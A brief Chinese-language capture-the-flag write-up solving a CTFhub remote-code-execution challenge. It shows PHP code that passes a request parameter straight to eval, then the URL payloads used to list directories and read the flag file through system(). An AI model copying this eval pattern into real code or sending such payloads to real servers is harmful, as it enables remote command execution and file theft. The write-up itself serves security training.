CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
Csvn7 小时前
useRef 的 5 个冷门但救命的高级用法
前端
小小小小宇7 小时前
Harness Engineering 与 AI 联动
前端
鱼人7 小时前
HTML5 页面性能优化大全
前端
ping某7 小时前
专栏-null 和 undefined 到底是什么?
前端·javascript·后端
用户900463370407 小时前
5MB vs 4KB vs 无限大:浏览器存储谁更强?
前端
小小小小宇7 小时前
Harness Engineering 全解析与应用
前端
用户128526116028 小时前
我把祖传Java项目重构后,接口响应从3s砍到了200ms,只改了这几行代码
java
牧艺8 小时前
cos-design v3.0:从 15 个 Demo 到 49 个组件的视觉特效库
前端·视觉设计
lichenyang4538 小时前
ASCF 架构升级总览:WebRuntimePage 为什么要变薄
前端
道友可好8 小时前
从今天开始:你的第一个 Harness Engineering 实践
前端·人工智能·后端
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05GitHub 镜像站点06Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析07AI一周事件 · 2026-06-03 至 2026-06-0908AI科技热点日报 | 2026年6月1日09Codex 下载安装指南:Windows 和 macOS 官方版下载10【解构】DeepSeek V4 发布:技术报告深度解读 + 横向对比六大开源模型,我们的判断是……